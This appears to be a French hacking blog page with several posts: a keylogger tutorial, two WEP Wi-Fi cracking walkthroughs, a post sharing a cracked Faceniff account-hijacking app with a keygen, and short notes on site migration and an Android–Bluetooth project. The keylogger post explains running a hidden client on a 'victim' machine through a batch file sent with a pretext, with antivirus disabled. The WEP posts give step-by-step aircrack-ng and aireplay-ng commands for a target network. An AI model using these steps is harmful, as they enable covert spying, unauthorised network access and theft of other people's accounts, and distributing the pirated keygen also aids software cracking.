Attaque ARP – Hack Ordinateur

Bonjour tout le monde! Voici un article très intéressant que j’ai écris sur les attaques ARP et qui vous explique comment en mener une!

Etant donné que je migre le site, j’ai écrit l’article sur le nouveau blog: https://causeyourestuck.io/2016/01/07/arp-spoofing-man-in-the-middle/

Migration du site… bientôt!

Bonjour tout le monde!

J’ai décidé de créer un nouveau site pour les programmeurs et autres personnes qui voudraient en apprendre un peu plus sur le monde de l’informatique. Vous y trouverez du hack, de la programmation sur ordinateur, sur micro-contrôleur, de la gestion de serveur, de l’infrastructure de réseau et beaucoup encore!

Je compte migrer très prochainement les articles de ce site vers le nouveau, j’en profiterais pour tous les mettre à jour!

Voici le lien: https://causeyourestuck.io/

A bientôt!

SpyKey : Enregistrer les frappes du clavier d’un ordinateur à distance

Bonjour à tous, aujourd’hui on repart sur un peu de hack ! Donc cet article vous présentera un logiciel espion qui est le spykey ou keylogger. Ce programme ne fonctionne que sur WINDOWS !!! Commencez par télécharger les fichiers nécessaires et je vous explique tout ça! TÉLÉCHARGER.

Vous remarquerez qu’il y a deux fichiers: SKC.exe et SKS.exe. Respectivement pour SpyKeyClient et SpyKeyServer. Le fichier SKC.exe vous le donnerez à la victime avec un fichier batch je vous explique plus tard. Ce qui est sympa avec ce hack c’est qu’on peut voir en directe la victime frapper sur son clavier! :-p

Pour commencer il faut lancer le serveur, tout marche en ligne de commande. Donc Shift + clique droit sur le dossier ou est contenu SKS.exe puis « ouvrir une commande windows ici ».

1

Puis une fois la commande ouverte, tapez: SKS.exe -help

2

 

Comme vous le voyez ce n’est pas si compliqué ! Il n’y a qu’une seule option et c’est spécifier le port sur lequel va se lancer le serveur. Par défaut le serveur se lance sur le port 8000. D’ailleurs si vous avez un anti virus il se peut qu’il le détecte comme dangereux. Alors désactivez votre anti virus pour ne pas être encombré (ou ajoutez le serveur à la liste des exceptions).

Donc pour moi ce sera le port par défaut. Il me suffis donc de tapé: SKS.exe

3

Donc maintenant le serveur est lancé. Allons voir du côté client ! (victime)

Pour lui ça ne sert à rien de tapé la commande -help, disons qu’il est comme qui dirait invisible donc rien n’apparaîtra :-p

Donc pour le client la syntaxe est la suivante : SKC.exe -a <address> -p <port>

Il prend deux paramètre, l’adresse et le port du serveur qui doit être lancé au préalable.

L’adresse du serveur c’est votre adresse IP. Ici vous avez deux choix. Soit vous ainsi que la victime êtes connecté sur le même réseaux soit vous ne l’êtes pas.

Si vous l’êtes alors l’adresse IP attendu est l’adresse IP local, vous pouvez l’obtenir en tapant ceci dans la commande Windows: ipconfig

4

Dans mon cas l’adresse IP local est 192.168.0.8

Soit vous n’êtes pas connecté sur le même réseaux et dans ce cas vous trouverez votre adresse IP à cette adresse par exemple: http://www.mon-ip.fr/

ATTENTION: Dans le cas où vous n’êtes pas sur le même réseau (c’est-à-dire dans 99% des cas à moins de vouloir espionner tes parents) il faut faire une REDIRECTION DE PORT sur votre adresse IP local !!! Pour ça je vous laisse chercher sur Google sinon ce serait trop long puisque ça dépend de chaque box. Mais en gros il faut aller sur l’interface web de configuration de votre box et rediriger le port que vous avez choisis pour le serveur (ça peut être n’importe quel chiffre compris 0 et 65536, mais bon grosso merdo beaucoup des 6000 premiers port sont déjà pris) vers votre IP locale.

Donc vous avez finalement votre IP et votre port voila un exemple pour démarrer le spykey: SKC.exe -a 192.168.0.8 -p 8000

Sauf que bon personne ne va télécharger un programme, ouvrir le terminal et taper ça dedans pour vous :-p Il faut automatiser la tache avec un batch. Donc ouvrez votre bloc note et collez y ce texte en adaptant pour l’ip et le port.

 @echo off
 START SKC.exe -a 192.168.0.8 -p 8000
 exit

Puis enregistrez en: ce_que_vous_voulez.bat

Une fois que c’est fais vous devriez avoir ceci d’un côté et de l’autre.

5

La partie de gauche vous pouvez la zipper et l’envoyer à qui vous voulez avec un motif de merde comme d’hab😉

Sinon voilà à quoi ça devrait ressemblé après avoir lancé le serveur et cliqué sur le client.

6

 

Voila c’est la fin du tuto! J’espère que vous avez apprécié ! A la prochaine😉

Communication Android et module bluetooth HC-06

Bonjour tout le monde! Voici une manière simple de faire communiquer un appareil sous Android avec le module bluetooth pour Arduino HC-06. Je n’ai pas pus tester si mon code fonctionne pour le module HC-05, mais en principe il n’y a pas de raison pour que ça ne marche pas.

Francais: https://causeyourestuck.io/2015/12/14/communication-android-et-module-bluetooth-hc-06/

English: https://en.causeyourestuck.io/2015/12/14/communication-between-android-and-hc-06-module/

 

Cracker une clef WEP avec Backtrack : en 10 min

** Hey! Je viens juste de rédiger un nouveau tuto sur les SPYKEY (Key Logger) ! Si t’es intéressé jette y un coup d’œil : ICI

 

Bonjour à tous! Voila un nouveau tuto pour apprendre à cracker une clef WEP avec backtrack .

Avant de commencé, je tiens à vous rappelé que cracker un réseau wifi autre que le votre est illégal et donc punis par la lois. Soyez donc conscient de ce que vous faites.

Bon, assurez-vous d’avoir une carte wifi compatible avec backtrack. Personnellement j’ai dû acheter un adaptateur (Alfa network awus036h) environ 20 euros sur PriceMinister. Ensuite téléchargez la dernière version ISO de backtrack qui ne s’appelle plus backtrack mais kali, juste là.

Ensuite il vous faudra télécharger VirtualBox qui vous permettra de lancer Kali. Voila le liens : https://www.virtualbox.org/wiki/Downloads

Une fois que c’est fais, lancez VirtualBox et créez une nouvelle machine virtuelle linux et fournissez l’image disque que vous avez téléchargé précédemment. Puis lancez la machine. Ensuite changez la langue du clavier comme ceci : Application > System tools > Preferences > System settings > keyboard > Layout settings.

Voilà nous y sommes! Lancez le terminal!

img1

Puis assurez vous d’avoir « branché » votre adaptateur a la machine virtuelle comme ceci :

img2

Bon, maintenant on commence pour de vrai :p Vous allez devoir passer votre carte réseaux en mode monitoring. Commencez par lister les cartes réseaux disponible avec cette commande : airmon-ng

img3

Vous devriez voir quelque chose comme ça. Maintenant il faut passer votre carte en mode monitoring. Tapez cette commande : airmon-ng start wlan0

Dans mon cas c’est « wlan0 », ça pourrait aussi être par exemple « eth0 ». Tout dépend de ce que vous avez eu à la commande « airmon-ng ».

img4

Info : Si comme moi vous avez eu la petite information au début vous disant « Found X processes that could cause trouble », vous pouvez arrêter ses processus en faisant : kill le_numero_pid exemple: kill 2424

Ensuite on va voir tout les réseaux a proximité crypté en WEP. Voila la commande : airodump-ng –encrypt WEP mon0

(Double tiret avant encrypt)

Vous verrez alors apparaitre ceci :

img6

Une fois que votre réseaux cible apparait, pressez Ctrl+C pour arrêter le scan.

Ensuite il faut capturer les paquets qui entrent et sortent du routeur de ce wifi. Pour cela tapez : airodump-ng –write maCapture –bssid leBssidDuWifi –channel leCanalDuWifi mon0

(Double tiret avant : write, bssid et channel)

Bon voyons voir un peu cette commande ^^ -L’argument « –write » va enregistrer les paquets capturé dans un fichier dont le nom est spécifié juste après : « maCapture ».

-Le deuxième argument « –bssid » correspond a la suite de chiffre et de lettre dans la colonne BSSID du screenshot ci-dessus. Aussi appelé adresse MAC.

-Enfin le troisième argument « –channel » qui correspond simplement au canal du wifi.

Toutes ces informations apparaissent normalement sur votre écran, la commande final dans notre cas sera donc : airodump-ng –write maCapture –bssid F4:CA:E5:AC:B7:B0 –channel 3 mon0

(Double tiret avant : write, bssid et channel)

Ce qui donne ceci :

img8

On y est presque, tenez bon ! :p Maintenant on capture les paquets du réseaux. On pourrais s’arrêter là et attendre 3h le temps que airodump-ng ai suffisamment de paquets. Seulement si on est sur Backtrack ou plutôt Kali ^^ C’est pour une raison bien précise. On va pouvoir faire une injection de paquets. C’est-à-dire que notre ordinateur va générer beaucoup de trafic sur le réseaux cible et donc va générer énormément de paquet qui vont par la suite nous servir a décrypter la clef WEP recherché.

Bon, sans plus attendre voilà la commande : aireplay-ng -e NomDuReseau -3 -b BssidReseau -h BssidStation mon0

Le premier arguments « -e » attend le nom du réseau cible.

Le deuxième argument « -3 », lui, indique simplement le type de l’attaque. Plus d’info en faisant : aireplay-ng /help

Le troisième argument « -b » attend comme précédemment la suite de chiffre et de lettre qui se trouve dans la colonne « BSSID ».

Et enfin « -h » attend la suite de chiffre et de lettre qui trouve dans la colonne « STATION ».

Donc ici, cela donne : aireplay-ng -e WORKGROUP -3 -b F4:CA:E5:AC:B7:B0 -h 98:C1:15:EB:F1:B5 mon0

Cette attaque va donc générer du trafic a partir de la station qui a pour adresse : 98:C1:15:EB:F1:B5. Si vous voulez aller plus vite, vous pouvez très bien lancer une deuxième attaque sur une autre station connecté au réseau. Enfin bon voila ce que donne cette commande :

img10

Attendez un peu que l’attaque démarre, une fois que c’est fais vous devriez voir le nombre de data augmenter!

img11

Une fois que vous avez atteins un nombre suffisent de data, (minimum 5000) vous pouvez essayé de décrypter la clef WEP avec aircrack-ng.

Voila la commande : aircrack-ng maCapture-01.cap

la commande est toute simple, par contre je ne vous ai pas dis qu’au départ lorsque vous avez lancé la capture de paquet, airodump-ng a automatiquement numéroter le nom de votre fichier. Donc si vous avez mis « capture », le fichier qui a été crée s’appelle « capture-01 », si un autre fichier existait déjà sous le même nom, votre fichier s’appelle alors « capture-02 » et ainsi de suite… Le « .cap » a la fin du nom est simplement l’extension de votre fichier.

Donc pour en revenir à nos moutons, voila ce que donne cette commande, qui est normalement la phase final😉

img13

Et une fois que vous avez assez d’IVS …. TADAAAAA !!!

img14

Et voilà vous avez le mot de passe du wifi!😉

J’espère que le tuto était clair, n’hésitez pas à commentez🙂

Hack WIFI en clef WEP avec Aircrack-ng

** Hey! Je viens juste de rédiger un nouveau tuto sur les SPYKEY (Key Logger) ! Si t’es intéressé jette y un coup d’œil : ICI

 

Bonjours alors voilà un tuto pour cracker une clef WEP avec Aircrack-ng sous Windows😉

Prérequis :
– Aircrack-ng : http://www.aircrack-ng.org/
– CommView for wifi : ICI

Une fois que je vous avez téléchargé et installé les deux logiciels, ouvrez CommView for wifi, allez dans l’onglet journal, puis coché « Enregistrement automatique ». Dans la case « Taille maximum du répertoire » mettez 10 000 et dans la case « Taille fichier » mettez 100.

photo1

Ensuite vous allez devoir capturer des paquets, pour cela cliquez sur l’icône « play » en haut à gauche de la fenêtre. Une autre petite fenêtre s’ouvre puis cliquez sur « Démarrer le balayage », sélectionnez ensuite le réseau que vous voulez (il doit être encrypter en WEP, c’est écrit en haut à droite de la fenêtre dans les propriétés du réseau) et cliquez sur « Capturer ».

photo2

photo3

La capture commence, vous devriez voir en bas à gauche de la page le nombre de paquets capturer, vous devez en avoir au moins 500 000, l’idéal serait 1 000 000 de paquets. Bon sur Windows il n’y a pas vraiment de moyen pour accélérer le processus de capture de paquets ou en tout cas s’il y en a, c’est assez compliqué et je ne sais pas comment faire :p Du coup il va falloir attendre en petit peu… Le temps dépend du trafic sur le réseau, pour moi ça a été à peu près 30min.

photo4

Bon une fois les paquets capturer, allez dans vos document puis CommView for Wifi et dans « Logs » et là vous devriez voir les paquets capturer, le seul souci c’est que ce format n’est pas reconnu par Aircrack-ng donc il va falloir le convertir en .CAP (format reconnu par Aircrcak-ng). Pour cela ouvrez les paquets avec CommView for Wifi, une petite fenêtre avec les paquets capturés va s’afficher, cliquez sur « Fichier », « Exporter les fichiers journaux », « Format Wireshark/Tcpdump ». Puis enregistrez où vous voulez.

photo11

photo2

Dans Aircrak, ouvrez le fichier « bin » puis lancez Aircrack-ng GUI. Sélectionnez la format WEP, puis une clef de 64 bit, cochez la case « use PTW attack » ensuite chargez les  les fichiers .CAP que vous avez capturer précédemment. Cliquez sur « launch », attendez que aircrack ouvre les fichiers .CAP, vous allez avoir une série de réseaux, puis il va vous demander un nombre, mettez 1 puis appuyez sur Entrée. Attendez que aircrack décrypte la clef, ça prend 2min pas plus, et voilà vous verrez le mot de passe s’afficher🙂 Si vous avez une erreur qui dit par exemple « try with 5000 ivs » ou quelque chose comme ça, c’est qu’il vous faut plus de paquets, faites une nouvelle capture et réessayez😉

photo12

photo2

photo

Crack compte Facebook, Twitter, Youtube, Amazone… ==> Faceniff

Bonjour à tous, alors voila une application Android très inintéressante qui va vous permettre d’accéder au compte Facebook, Twitter, Youtube et autres… des personne connecter au même réseau que vous! Pour cela il vous faut un android qui sois ROOTE, c’est très important sinon ça ne marchera pas😦 Cette fameuse application se nomme « Faceniff », elle n’est pas très compliqué a trouver sur le net et elle limite le nombre de compte que vous pouvez cracker à 3. Et c’est pour cela que je poste ce tuto, j’ai chercher des heures et des heures sur internet, de fond en comble et j’ai trouvé un logiciel qui vous permet d’avoir la version débloqué de Faceniff🙂 Voila le lien :

https://www.dropbox.com/s/wi4p7i31o6p8yse/Faceniff.rar

Alors dans ce .rar vous trouver Faceniff v2.3.apk et un générateur de clef qui devrais ressemble a ça :

faceniff

Sur le générateur c’est écrit Faceniff 2.1b mais elle fonctionne sur la 2.3, je l’ai tester moi même🙂

Dans la case « Device ID » il faut mettre un code qui se trouve sur votre android. Allez dans Faceniff, puis dans les options et choisissez « Unlock », la, une petite page s’ouvrira et vous devrez rentré votre clef. Et juste en bas, vous pourrez voir un espèce de numéro de série qui est en fait votre adresse MAC sans les « : », entrez le dans le générateur de clef sur votre ordinateur, appuyez sur le bouton « Generate » puis vous aurez votre clef d’activation🙂 Entrez la dans Faceniff puis il vous demandera de redémarrer l’application, fermez le serveur et quitter l’appli, redémarrez la et c’est bon🙂 Vous pouvez cracker autant de compte que vous voulez🙂 ENJOY!!

(Application à utiliser avec modération :p)